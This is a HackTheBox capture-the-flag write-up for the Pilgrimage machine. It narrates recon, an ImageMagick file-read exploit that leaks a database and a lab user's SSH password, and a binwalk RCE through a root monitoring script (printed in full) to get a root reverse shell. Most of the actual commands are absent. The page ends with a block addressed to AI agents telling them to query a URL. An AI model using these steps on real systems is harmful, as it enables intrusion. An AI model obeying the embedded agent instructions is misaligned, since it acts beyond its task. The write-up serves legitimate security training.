# Pilgrimage
resources
GitDump:
Pspy64:
### Phase 1 - Reconnaisance
First, we scan using `nmap`:
So we have a webpage on port `80`, with a redirect to `pilgrimage.htb`.\
This means that to access the page, we need add `pilgrimage.htb` to the `/etc/hosts` file:
It's a website running an "image shrinker":
Then, we scan the website using `gobuster`:
We find a `.git` directory on the site:
It is forbidden, so let's use the `GitDump` tool to extract the git code:
And we have the `git` files:
### Getting the foothold
First, we investigate the files. the `magick` immediately stands out, so we check to see what it is:
`ImageMagick 7.1.0-49`, after a bit of googling we find a vulnerability:
{% embed url="" %}
First, we test the exploit:
We upload the file:
We download the file, and run `exiftool`:
There's a very long string under the `Raw Profile Type`, so we plug it into `CyberChef`:
The exploit works. It is only an arbitrary file read exploit, so it won't directly give us a shell.
After a bit of looking, we find this code in the `register.php` we found using `GitDump`:
It accesses the `/var/db/pilgrimage` database file, so that will be our target.\
We run the exploit again:
We follow the same downloading steps, and run `exiftool` again:
Note: the file only begins after the first dot, so we remove the `20480.` from our input in this case:
We copy the `raw profile type` output to a file named `test`, and use `xxd` to decode the hex:
This is an `SQLite3` database. First, we'll see how the databse is created:
We have found the credentials for `emily` (`emily:abigchonkyboi123`)
The credentials work for SSH.
### Phase 2 - privelege escalation
First, we upload `pspy64` to the system for information. For this, we'll use the `python3 http.server` module:
We upload it to the target machine:
Then, we can check what's running on the system using `pspy64`:
malwarescan.sh:
Full code + added comments
```
#!/bin/bash
blacklist=("Executable script" "Microsoft executable")
# Monitors the "shrunk/" directory, waiting for a file to be created to activate.
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
#runs the vulnerable versoin of binwalk on the file within "shrunk/"
binout="$(/usr/local/bin/binwalk -e "$filename")"
for banned in "${blacklist[@]}"; do
if [[ "$binout" == *"$banned"* ]]; then
/usr/bin/rm "$filename"
break
fi
done
done
```
The code monitors the `shrunk/` directory of the website, activating when a new file appears. When it activates, it pipes the output into the next command;\
In this command, the original filename is extracted.\
Then, `binwalk` is ran un the file, where the output is scanned for some keywords.
We notice the file will run `binwalk` as root, so let's check the version:
After a bit of googling, we find that this `binwalk` version is vulnerable to an RCE exploit:
{% embed url="" %}
Because the code will run any new file in the `shrunk/` directory through `binwalk` , we only need to create an image with the payload inside of the directory to get our reverse shell back.
### Exploitation
We copy the code locally, and save it as `binwalk_exploit.py` . Then we give it any image file as input, our HackTheBox VPN IP address, and the listening port.
Before we upload the shell, we open a listener on the port we specified earlier:
To upload the image, we use the `python3 http.server` module, in the same directory as the image we created:
Then, we upload the image to the machine:
And we get a reverse shell back, as root:
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://eduw.gitbook.io/writeups/hackthebox/pilgrimage.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.